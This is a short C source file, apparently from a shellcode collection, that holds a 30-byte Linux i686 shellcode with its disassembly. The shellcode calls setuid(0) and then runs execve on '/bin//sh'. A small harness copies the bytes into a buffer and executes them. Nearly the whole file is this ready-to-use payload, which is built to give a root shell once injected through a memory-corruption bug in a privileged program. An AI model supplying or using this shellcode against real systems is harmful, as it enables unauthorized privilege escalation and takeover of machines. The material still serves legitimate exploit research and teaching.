/*
Title   : Linux i686 setuid(0) execve shell (30 bytes)
Author  : rastating

08048060 <_start>:
 8048060:	31 db                	xor    %ebx,%ebx
 8048062:	8d 43 17             	lea    0x17(%ebx),%eax
 8048065:	cd 80                	int    $0x80
 8048067:	31 c9                	xor    %ecx,%ecx
 8048069:	31 d2                	xor    %edx,%edx
 804806b:	52                   	push   %edx
 804806c:	68 2f 2f 73 68       	push   $0x68732f2f
 8048071:	68 2f 62 69 6e       	push   $0x6e69622f
 8048076:	8d 1c 24             	lea    (%esp),%ebx
 8048079:	8d 41 0b             	lea    0xb(%ecx),%eax
 804807c:	cd 80                	int    $0x80
*/

#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned char code[] =
        "\x31\xdb\x8d\x43\x17\xcd\x80\x31"
        "\xc9\x31\xd2\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x8d\x1c"
        "\x24\x8d\x41\x0b\xcd\x80";

    printf("Shellcode length: %d\n", strlen(code));

    void (*s)() = (void *)code;
    s();

    return 0;
}